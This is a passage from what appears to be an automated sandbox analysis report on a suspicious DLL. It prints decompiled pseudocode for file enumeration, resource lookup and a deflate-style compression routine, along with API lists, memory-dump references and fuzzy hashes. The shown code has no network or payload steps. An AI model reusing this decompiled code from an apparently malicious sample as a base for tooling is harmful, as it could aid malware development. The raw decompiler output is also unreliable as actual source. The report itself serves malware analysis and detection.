							_push("\\");
							_t62 = E100092C6(_t51);
							_t65 = _t65 + 0x10;
							_v12 = _t62;
							if(_t62 != 0) {
								_t56 =  *0x1001e684; // 0x4d2f878
								 *((intOrPtr*)(_t56 + 0xb4))(1);
								_push(1);
								_push(1);
								_push(0);
								E1000AEF6(_t62, _t80, 1, 5, E1000EFEC, _a16);
								_t65 = _t65 + 0x1c;
								E100085FB( &_v12, 0xfffffffe);
							}
							goto L16;
						}
						_t63 = 0;
						do {
							_t10 = _t63 + 0x1001e78c; // 0x0
							_push( *_t10);
							_push( &(_v608.cFileName));
							_t44 =  *0x1001e690; // 0x4d2fb18
							if( *((intOrPtr*)(_t44 + 0x18))() == 0) {
								goto L12;
							}
							_t48 = E1000EFEC(_t80, _t51,  &_v608, _a16);
							_t65 = _t65 + 0xc;
							if(_t48 == 0) {
								break;
							}
							_t49 =  *0x1001e684; // 0x4d2f878
							 *((intOrPtr*)(_t49 + 0xb4))(1);
							L12:
							_t63 = _t63 + 4;
						} while (_t63 < 4);
						if((_v608.dwFileAttributes & 0x00000010) == 0) {
							goto L16;
						}
						goto L14;
					}
					L16:
					_t36 = FindNextFileW(_t61,  &_v608);
					_t31 = 0x2e;
				} while (_t36 != 0);
				_t37 =  *0x1001e684; // 0x4d2f878
				 *((intOrPtr*)(_t37 + 0x78))(_t61);
				goto L18;
			}























                                                                                                                                                                                                0x1000aef6
                                                                                                                                                                                                0x1000af02
                                                                                                                                                                                                0x1000af04
                                                                                                                                                                                                0x1000af06
                                                                                                                                                                                                0x1000af0c
                                                                                                                                                                                                0x1000af11
                                                                                                                                                                                                0x1000af14
                                                                                                                                                                                                0x1000af19
                                                                                                                                                                                                0x1000b053
                                                                                                                                                                                                0x1000b053
                                                                                                                                                                                                0x1000af2d
                                                                                                                                                                                                0x1000af32
                                                                                                                                                                                                0x1000b042
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000b04e
                                                                                                                                                                                                0x1000af3a
                                                                                                                                                                                                0x1000af3b
                                                                                                                                                                                                0x1000af42
                                                                                                                                                                                                0x1000af71
                                                                                                                                                                                                0x1000afc4
                                                                                                                                                                                                0x1000afc4
                                                                                                                                                                                                0x1000afcc
                                                                                                                                                                                                0x1000afcd
                                                                                                                                                                                                0x1000afd8
                                                                                                                                                                                                0x1000afda
                                                                                                                                                                                                0x1000afdd
                                                                                                                                                                                                0x1000afe2
                                                                                                                                                                                                0x1000afe4
                                                                                                                                                                                                0x1000afec
                                                                                                                                                                                                0x1000aff2
                                                                                                                                                                                                0x1000aff4
                                                                                                                                                                                                0x1000aff6
                                                                                                                                                                                                0x1000b00b
                                                                                                                                                                                                0x1000b010
                                                                                                                                                                                                0x1000b019
                                                                                                                                                                                                0x1000b01f
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000afe2
                                                                                                                                                                                                0x1000af73
                                                                                                                                                                                                0x1000af75
                                                                                                                                                                                                0x1000af75
                                                                                                                                                                                                0x1000af75
                                                                                                                                                                                                0x1000af81
                                                                                                                                                                                                0x1000af82
                                                                                                                                                                                                0x1000af8c
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000af99
                                                                                                                                                                                                0x1000af9e
                                                                                                                                                                                                0x1000afa3
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000afa5
                                                                                                                                                                                                0x1000afac
                                                                                                                                                                                                0x1000afb2
                                                                                                                                                                                                0x1000afb2
                                                                                                                                                                                                0x1000afb5
                                                                                                                                                                                                0x1000afc2
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000afc2
                                                                                                                                                                                                0x1000b020
                                                                                                                                                                                                0x1000b028
                                                                                                                                                                                                0x1000b032
                                                                                                                                                                                                0x1000b032
                                                                                                                                                                                                0x1000b039
                                                                                                                                                                                                0x1000b03f
                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 1000AF27
                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 1000B028
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FileFind$FirstNext
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1690352074-0
                                                                                                                                                                                                • Opcode ID: ca3de102864d8ee622d69b58eebc667b6fae20f492893706f8c74e36c40fa9fd
                                                                                                                                                                                                • Instruction ID: 8b2e33f5fec1479e8f65e5dd4cd2829ae921fb9f591b6d0b0abd318ade50dbf3
                                                                                                                                                                                                • Opcode Fuzzy Hash: ca3de102864d8ee622d69b58eebc667b6fae20f492893706f8c74e36c40fa9fd
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0231C072A0035A6BFB10DBA4CC89FAE77B8EB047D0F0041A4F605A61D5E770EE848B61
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 100097ED, Relevance: 3.0, APIs: 2, Instructions: 24timeCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?,?,10005F90), ref: 100097FA
                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1000981A
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1518329722-0
                                                                                                                                                                                                • Opcode ID: 5adf31d11d863f069cab60e7e3886ce41b66a1e7e29a226f63a69a5805f02e98
                                                                                                                                                                                                • Instruction ID: df5b11f1c75c709aa4256a17088896f4071e5684466f1f315a6c8f8be7f84200
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5adf31d11d863f069cab60e7e3886ce41b66a1e7e29a226f63a69a5805f02e98
                                                                                                                                                                                                • Instruction Fuzzy Hash: 45E04F7A9007187FDB51EF689D46A9ABBFDEB84A00F118954AC85B7348E570EF048790
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1000A55C, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E1000A55C(struct HINSTANCE__* __ecx, CHAR* __edx, void* __fp0, intOrPtr* _a4) {
				CHAR* _v8;
				struct HRSRC__* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _t15;
				signed int _t17;
				struct HRSRC__* _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr* _t23;
				intOrPtr* _t26;
				struct HINSTANCE__* _t28;
				intOrPtr _t30;
				intOrPtr* _t33;
				signed int _t35;
				intOrPtr _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t43 = __fp0;
				_t29 = __ecx;
				_v8 = __edx;
				_t28 = __ecx;
				_v20 = 0xa;
				_t35 = 0;
				_v16 = 3;
				while(1) {
					_t15 =  *0x1001e688; // 0x4cb04a0
					_t17 = E10012465(_t29, 0, _t43, _t15 + 0x648, 0x1e, 0x32);
					_t29 =  *0x1001e688; // 0x4cb04a0
					_t39 = _t39 + 0xc;
					_t4 = _t29 + 0x644; // 0x0
					_t20 = FindResourceA(_t28, _v8, _t17 *  *_t4 +  *((intOrPtr*)(_t38 + _t35 * 4 - 0x10)));
					_v12 = _t20;
					if(_t20 != 0) {
						break;
					}
					_t35 = _t35 + 1;
					if(_t35 < 2) {
						continue;
					}
					L5:
					return 0;
				}
				_t21 =  *0x1001e684; // 0x4d2f878
				_t22 =  *((intOrPtr*)(_t21 + 0x98))(_t28, _t20);
				_t30 =  *0x1001e684; // 0x4d2f878
				_t37 = _t22;
				_t23 =  *((intOrPtr*)(_t30 + 0x9c))(_t28, _v12);
				__eflags = _t23;
				if(_t23 != 0) {
					_t33 = E1000864A(_t23, _t37);
					__eflags = _t33;
					if(_t33 == 0) {
						goto L5;
					}
					_t26 = _a4;
					__eflags = _t26;
					if(_t26 != 0) {
						 *_t26 = _t37;
					}
					return _t33;
				}
				goto L5;
			}






















                                                                                                                                                                                                0x1000a55c
                                                                                                                                                                                                0x1000a55c
                                                                                                                                                                                                0x1000a565
                                                                                                                                                                                                0x1000a568
                                                                                                                                                                                                0x1000a56a
                                                                                                                                                                                                0x1000a571
                                                                                                                                                                                                0x1000a573
                                                                                                                                                                                                0x1000a57a
                                                                                                                                                                                                0x1000a57a
                                                                                                                                                                                                0x1000a58f
                                                                                                                                                                                                0x1000a594
                                                                                                                                                                                                0x1000a59a
                                                                                                                                                                                                0x1000a59d
                                                                                                                                                                                                0x1000a5ad
                                                                                                                                                                                                0x1000a5b3
                                                                                                                                                                                                0x1000a5b8
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000a5ba
                                                                                                                                                                                                0x1000a5be
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000a5e5
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000a5e5
                                                                                                                                                                                                0x1000a5c3
                                                                                                                                                                                                0x1000a5c9
                                                                                                                                                                                                0x1000a5d2
                                                                                                                                                                                                0x1000a5d8
                                                                                                                                                                                                0x1000a5db
                                                                                                                                                                                                0x1000a5e1
                                                                                                                                                                                                0x1000a5e3
                                                                                                                                                                                                0x1000a5f2
                                                                                                                                                                                                0x1000a5f4
                                                                                                                                                                                                0x1000a5f6
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000a5f8
                                                                                                                                                                                                0x1000a5fb
                                                                                                                                                                                                0x1000a5fd
                                                                                                                                                                                                0x1000a5ff
                                                                                                                                                                                                0x1000a5ff
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000a601
                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 10012465: _ftol2_sse.MSVCRT ref: 100124C6
                                                                                                                                                                                                • FindResourceA.KERNEL32(10000000,?,0000000A), ref: 1000A5AD
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FindResource_ftol2_sse
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 726351646-0
                                                                                                                                                                                                • Opcode ID: 09db64f82ff27f4723c2f1b62d6aeaba463d45ed4d0f3522aaf98fb1050e951e
                                                                                                                                                                                                • Instruction ID: 572c9de28148780b48db31adbdc9b0c86f97872e6d9a47d1e0b19fac1a6d80de
                                                                                                                                                                                                • Opcode Fuzzy Hash: 09db64f82ff27f4723c2f1b62d6aeaba463d45ed4d0f3522aaf98fb1050e951e
                                                                                                                                                                                                • Instruction Fuzzy Hash: C7119D71A00315AFFB04CB69DC85E5E7BECEB55385F014068F809D7252EA71DE808B54
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 10016EF0, Relevance: .4, Instructions: 359COMMONCrypto
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 99%
                                                                                                                                                                                                			E10016EF0(intOrPtr _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed short* _v12;
				char _v16;
				signed short _v20;
				unsigned int _v24;
				signed short _v28;
				signed int _t223;
				signed int _t235;
				signed int _t237;
				signed short _t240;
				signed int _t241;
				signed short _t244;
				signed int _t245;
				signed short _t248;
				signed int _t249;
				signed int _t250;
				void* _t254;
				signed char _t259;
				signed int _t275;
				signed int _t289;
				signed int _t308;
				signed short _t316;
				signed int _t321;
				void* _t329;
				signed short _t330;
				signed short _t333;
				signed short _t334;
				signed short _t343;
				signed short _t346;
				signed short _t347;
				signed short _t348;
				signed short _t358;
				signed short _t361;
				signed short _t362;
				signed short _t363;
				signed short _t370;
				signed int _t373;
				signed int _t378;
				signed short _t379;
				signed short _t382;
				unsigned int _t388;
				unsigned short _t390;
				unsigned short _t392;
				unsigned short _t394;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t400;
				signed short _t401;
				signed int _t402;
				signed int _t403;
				signed int _t407;
				signed int _t409;

				_t223 = _a8;
				_t235 =  *(_t223 + 2) & 0x0000ffff;
				_push(_t397);
				_t388 = 0;
				_t398 = _t397 | 0xffffffff;
				if(_a12 < 0) {
					L42:
					return _t223;
				} else {
					_t329 =  !=  ? 7 : 0x8a;
					_v12 = _t223 + 6;
					_t254 = (0 | _t235 != 0x00000000) + 3;
					_v16 = _a12 + 1;
					do {
						_v24 = _t388;
						_t388 = _t388 + 1;
						_a8 = _t235;
						_a12 = _t235;
						_v8 =  *_v12 & 0x0000ffff;
						_t223 = _a4;
						if(_t388 >= _t329) {
							L4:
							if(_t388 >= _t254) {
								if(_a8 == 0) {
									_t122 = _t223 + 0x16bc; // 0xec8b55c3
									_t400 =  *_t122;
									if(_t388 > 0xa) {
										_t168 = _t223 + 0xac4; // 0xff0c75ff
										_t330 =  *_t168 & 0x0000ffff;
										_t169 = _t223 + 0xac6; // 0x875ff0c
										_t237 =  *_t169 & 0x0000ffff;
										_v24 = _t330;
										_t171 = _t223 + 0x16b8; // 0x5d5b5e5f
										_t333 = (_t330 << _t400 |  *_t171) & 0x0000ffff;
										_v28 = _t333;
										if(_t400 <= 0x10 - _t237) {
											_t259 = _t400 + _t237;
										} else {
											_t173 = _t223 + 0x14; // 0xc703f045
											 *(_t223 + 0x16b8) = _t333;
											_t175 = _t223 + 8; // 0x8d000040
											 *((char*)( *_t175 +  *_t173)) = _v28;
											_t223 = _a4;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t181 = _t223 + 0x14; // 0xc703f045
											_t182 = _t223 + 8; // 0x8d000040
											_t183 = _t223 + 0x16b9; // 0xc35d5b5e
											 *((char*)( *_t181 +  *_t182)) =  *_t183;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t333 = _v24 >> 0x10;
											_t189 = _t223 + 0x16bc; // 0xec8b55c3
											_t259 =  *_t189 + 0xfffffff0 + _t237;
										}
										_t334 = _t333 & 0x0000ffff;
										 *(_t223 + 0x16bc) = _t259;
										 *(_t223 + 0x16b8) = _t334;
										_t401 = _t334 & 0x0000ffff;
										if(_t259 <= 9) {
											_t209 = _t388 - 0xb; // -10
											 *(_t223 + 0x16b8) = _t209 << _t259 | _t401;
											 *(_t223 + 0x16bc) = _t259 + 7;
										} else {
											_t193 = _t223 + 8; // 0x8d000040
											_t390 = _t388 + 0xfffffff5;
											_t194 = _t223 + 0x14; // 0xc703f045
											_t240 = _t390 << _t259 | _t401;
											 *(_t223 + 0x16b8) = _t240;
											 *( *_t193 +  *_t194) = _t240;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t199 = _t223 + 0x14; // 0xc703f045
											_t200 = _t223 + 8; // 0x8d000040
											_t201 = _t223 + 0x16b9; // 0xc35d5b5e
											 *((char*)( *_t199 +  *_t200)) =  *_t201;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff7;
											 *(_t223 + 0x16b8) = _t390 >> 0x10;
										}
										goto L35;
									}
									_t123 = _t223 + 0xac0; // 0x6aec8b
									_t343 =  *_t123 & 0x0000ffff;
									_t124 = _t223 + 0xac2; // 0x75ff006a
									_t241 =  *_t124 & 0x0000ffff;
									_v24 = _t343;
									_t126 = _t223 + 0x16b8; // 0x5d5b5e5f
									_t346 = (_t343 << _t400 |  *_t126) & 0x0000ffff;
									_v28 = _t346;
									if(_t400 > 0x10 - _t241) {
										_t128 = _t223 + 0x14; // 0xc703f045
										 *(_t223 + 0x16b8) = _t346;
										_t130 = _t223 + 8; // 0x8d000040
										 *((char*)( *_t130 +  *_t128)) = _v28;
										_t223 = _a4;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t136 = _t223 + 0x14; // 0xc703f045
										_t137 = _t223 + 8; // 0x8d000040
										_t138 = _t223 + 0x16b9; // 0xc35d5b5e
										 *((char*)( *_t136 +  *_t137)) =  *_t138;
										_t142 = _t223 + 0x16bc; // 0xec8b55c3
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t346 = _v24 >> 0x10;
										_t400 =  *_t142 + 0xfffffff0;
									}
									_t403 = _t400 + _t241;
									_t347 = _t346 & 0x0000ffff;
									 *(_t223 + 0x16bc) = _t403;
									 *(_t223 + 0x16b8) = _t347;
									_t348 = _t347 & 0x0000ffff;
									if(_t403 <= 0xd) {
										_t163 = _t403 + 3; // 0xec8b55c6
										_t275 = _t163;
										L28:
										 *(_t223 + 0x16bc) = _t275;
										_t165 = _t388 - 3; // -2
										_t166 = _t223 + 0x16b8; // 0x5d5b5e5f
										 *(_t223 + 0x16b8) = (_t165 << _t403 |  *_t166 & 0x0000ffff) & 0x0000ffff;
									} else {
										_t392 = _t388 + 0xfffffffd;
										_t147 = _t223 + 0x14; // 0xc703f045
										_t244 = _t392 << _t403 | _t348;
										_t148 = _t223 + 8; // 0x8d000040
										 *(_t223 + 0x16b8) = _t244;
										 *( *_t148 +  *_t147) = _t244;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t153 = _t223 + 0x14; // 0xc703f045
										_t154 = _t223 + 8; // 0x8d000040
										_t155 = _t223 + 0x16b9; // 0xc35d5b5e
										 *((char*)( *_t153 +  *_t154)) =  *_t155;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff3;
										 *(_t223 + 0x16b8) = _t392 >> 0x00000010 & 0x0000ffff;
									}
									goto L35;
								}
								_t289 = _a12;
								if(_t289 != _t398) {
									_t53 = _t289 * 4; // 0x5dc033c3
									_t396 =  *(_t223 + _t53 + 0xa7e) & 0x0000ffff;
									_t56 = _t235 * 4; // 0x33c35d0c
									_t370 =  *(_t223 + _t56 + 0xa7c) & 0x0000ffff;
									_t58 = _t223 + 0x16bc; // 0xec8b55c3
									_t407 =  *_t58;
									_v28 = _t370;
									_t60 = _t223 + 0x16b8; // 0x5d5b5e5f
									_t249 = (_t370 << _t407 |  *_t60) & 0x0000ffff;
									if(_t407 <= 0x10 - _t396) {
										_t373 = _t249;
										_t308 = _t407 + _t396;
									} else {
										_t61 = _t223 + 0x14; // 0xc703f045
										_t62 = _t223 + 8; // 0x8d000040
										 *(_t223 + 0x16b8) = _t249;
										 *( *_t62 +  *_t61) = _t249;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t67 = _t223 + 0x14; // 0xc703f045
										_t68 = _t223 + 8; // 0x8d000040
										_t69 = _t223 + 0x16b9; // 0xc35d5b5e
										 *((char*)( *_t67 +  *_t68)) =  *_t69;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t75 = _t223 + 0x16bc; // 0xec8b55c3
										_t373 = _v28 >> 0x00000010 & 0x0000ffff;
										_t308 =  *_t75 + 0xfffffff0 + _t396;
									}
									_t388 = _v24;
									 *(_t223 + 0x16bc) = _t308;
									 *(_t223 + 0x16b8) = _t373;
								}
								_t80 = _t223 + 0xabc; // 0x55c35dc0
								_t358 =  *_t80 & 0x0000ffff;
								_t81 = _t223 + 0x16bc; // 0xec8b55c3
								_t402 =  *_t81;
								_t82 = _t223 + 0xabe; // 0xec8b55c3
								_t245 =  *_t82 & 0x0000ffff;
								_v24 = _t358;
								_t84 = _t223 + 0x16b8; // 0x5d5b5e5f
								_t361 = (_t358 << _t402 |  *_t84) & 0x0000ffff;
								_v28 = _t361;
								if(_t402 > 0x10 - _t245) {
									_t86 = _t223 + 0x14; // 0xc703f045
									 *(_t223 + 0x16b8) = _t361;
									_t88 = _t223 + 8; // 0x8d000040
									 *((char*)( *_t88 +  *_t86)) = _v28;
									_t223 = _a4;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t94 = _t223 + 0x14; // 0xc703f045
									_t95 = _t223 + 8; // 0x8d000040
									_t96 = _t223 + 0x16b9; // 0xc35d5b5e
									 *((char*)( *_t94 +  *_t95)) =  *_t96;
									_t100 = _t223 + 0x16bc; // 0xec8b55c3
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t361 = _v24 >> 0x10;
									_t402 =  *_t100 + 0xfffffff0;
								}
								_t403 = _t402 + _t245;
								_t362 = _t361 & 0x0000ffff;
								 *(_t223 + 0x16bc) = _t403;
								 *(_t223 + 0x16b8) = _t362;
								_t363 = _t362 & 0x0000ffff;
								if(_t403 <= 0xe) {
									_t121 = _t403 + 2; // 0xec8b55c5
									_t275 = _t121;
									goto L28;
								} else {
									_t394 = _t388 + 0xfffffffd;
									_t105 = _t223 + 0x14; // 0xc703f045
									_t248 = _t394 << _t403 | _t363;
									_t106 = _t223 + 8; // 0x8d000040
									 *(_t223 + 0x16b8) = _t248;
									 *( *_t106 +  *_t105) = _t248;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t111 = _t223 + 0x14; // 0xc703f045
									_t112 = _t223 + 8; // 0x8d000040
									_t113 = _t223 + 0x16b9; // 0xc35d5b5e
									 *((char*)( *_t111 +  *_t112)) =  *_t113;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff2;
									 *(_t223 + 0x16b8) = _t394 >> 0x00000010 & 0x0000ffff;
									goto L35;
								}
							} else {
								_t316 = _t223 + (_t235 + 0x29f) * 4;
								_v28 = _t316;
								do {
									_t378 = _a12;
									_t22 = _t223 + 0x16bc; // 0xec8b55c3
									_t409 =  *_t22;
									_t24 = _t378 * 4; // 0x5dc033c3
									_t250 =  *(_t223 + _t24 + 0xa7e) & 0x0000ffff;
									_t379 =  *_t316 & 0x0000ffff;
									_v24 = _t379;
									_t27 = _t223 + 0x16b8; // 0x5d5b5e5f
									_t382 = (_t379 << _t409 |  *_t27) & 0x0000ffff;
									_v20 = _t382;
									if(_t409 <= 0x10 - _t250) {
										_t321 = _t409 + _t250;
									} else {
										_t29 = _t223 + 0x14; // 0xc703f045
										 *(_t223 + 0x16b8) = _t382;
										_t31 = _t223 + 8; // 0x8d000040
										 *((char*)( *_t31 +  *_t29)) = _v20;
										_t223 = _a4;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t37 = _t223 + 0x14; // 0xc703f045
										_t38 = _t223 + 8; // 0x8d000040
										_t39 = _t223 + 0x16b9; // 0xc35d5b5e
										 *((char*)( *_t37 +  *_t38)) =  *_t39;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t382 = _v24 >> 0x10;
										_t45 = _t223 + 0x16bc; // 0xec8b55c3
										_t321 =  *_t45 + 0xfffffff0 + _t250;
									}
									 *(_t223 + 0x16bc) = _t321;
									_t316 = _v28;
									 *(_t223 + 0x16b8) = _t382 & 0x0000ffff;
									_t388 = _t388 - 1;
								} while (_t388 != 0);
								L35:
								_t235 = _v8;
								_t388 = 0;
								_t398 = _a12;
								if(_t235 != 0) {
									if(_a8 != _t235) {
										_t329 = 7;
										_t217 = _t329 - 3; // 0x4
										_t254 = _t217;
									} else {
										_t329 = 6;
										_t216 = _t329 - 3; // 0x3
										_t254 = _t216;
									}
								} else {
									_t329 = 0x8a;
									_t214 = _t388 + 3; // 0x3
									_t254 = _t214;
								}
								goto L41;
							}
						}
						_t223 = _a4;
						if(_t235 == _v8) {
							_t235 = _v8;
							goto L41;
						}
						goto L4;
						L41:
						_v12 =  &(_v12[2]);
						_t221 =  &_v16;
						 *_t221 = _v16 - 1;
					} while ( *_t221 != 0);
					goto L42;
				}
			}
























































                                                                                                                                                                                                0x10016ef3
                                                                                                                                                                                                0x10016efa
                                                                                                                                                                                                0x10016efe
                                                                                                                                                                                                0x10016f00
                                                                                                                                                                                                0x10016f02
                                                                                                                                                                                                0x10016f08
                                                                                                                                                                                                0x100173f5
                                                                                                                                                                                                0x100173fb
                                                                                                                                                                                                0x10016f0e
                                                                                                                                                                                                0x10016f1a
                                                                                                                                                                                                0x10016f27
                                                                                                                                                                                                0x10016f2a
                                                                                                                                                                                                0x10016f31
                                                                                                                                                                                                0x10016f34
                                                                                                                                                                                                0x10016f37
                                                                                                                                                                                                0x10016f3a
                                                                                                                                                                                                0x10016f3b
                                                                                                                                                                                                0x10016f3e
                                                                                                                                                                                                0x10016f44
                                                                                                                                                                                                0x10016f47
                                                                                                                                                                                                0x10016f4c
                                                                                                                                                                                                0x10016f5c
                                                                                                                                                                                                0x10016f5e
                                                                                                                                                                                                0x10017014
                                                                                                                                                                                                0x100171a3
                                                                                                                                                                                                0x100171a3
                                                                                                                                                                                                0x100171ac
                                                                                                                                                                                                0x100172bf
                                                                                                                                                                                                0x100172bf
                                                                                                                                                                                                0x100172c6
                                                                                                                                                                                                0x100172c6
                                                                                                                                                                                                0x100172cf
                                                                                                                                                                                                0x100172dc
                                                                                                                                                                                                0x100172e5
                                                                                                                                                                                                0x100172e8
                                                                                                                                                                                                0x100172ed
                                                                                                                                                                                                0x10017335
                                                                                                                                                                                                0x100172ef
                                                                                                                                                                                                0x100172ef
                                                                                                                                                                                                0x100172f2
                                                                                                                                                                                                0x100172f9
                                                                                                                                                                                                0x100172ff
                                                                                                                                                                                                0x10017302
                                                                                                                                                                                                0x10017305
                                                                                                                                                                                                0x10017308
                                                                                                                                                                                                0x1001730b
                                                                                                                                                                                                0x1001730e
                                                                                                                                                                                                0x10017314
                                                                                                                                                                                                0x10017322
                                                                                                                                                                                                0x10017325
                                                                                                                                                                                                0x10017328
                                                                                                                                                                                                0x10017331
                                                                                                                                                                                                0x10017331
                                                                                                                                                                                                0x10017338
                                                                                                                                                                                                0x1001733b
                                                                                                                                                                                                0x10017341
                                                                                                                                                                                                0x10017348
                                                                                                                                                                                                0x1001734e
                                                                                                                                                                                                0x1001739c
                                                                                                                                                                                                0x100173a8
                                                                                                                                                                                                0x100173af
                                                                                                                                                                                                0x10017350
                                                                                                                                                                                                0x10017350
                                                                                                                                                                                                0x10017353
                                                                                                                                                                                                0x1001735c
                                                                                                                                                                                                0x1001735f
                                                                                                                                                                                                0x10017362
                                                                                                                                                                                                0x10017369
                                                                                                                                                                                                0x1001736c
                                                                                                                                                                                                0x1001736f
                                                                                                                                                                                                0x10017372
                                                                                                                                                                                                0x10017375
                                                                                                                                                                                                0x1001737b
                                                                                                                                                                                                0x10017386
                                                                                                                                                                                                0x1001738c
                                                                                                                                                                                                0x10017393
                                                                                                                                                                                                0x10017393
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1001734e
                                                                                                                                                                                                0x100171b2
                                                                                                                                                                                                0x100171b2
                                                                                                                                                                                                0x100171b9
                                                                                                                                                                                                0x100171b9
                                                                                                                                                                                                0x100171c2
                                                                                                                                                                                                0x100171cf
                                                                                                                                                                                                0x100171d8
                                                                                                                                                                                                0x100171db
                                                                                                                                                                                                0x100171e0
                                                                                                                                                                                                0x100171e2
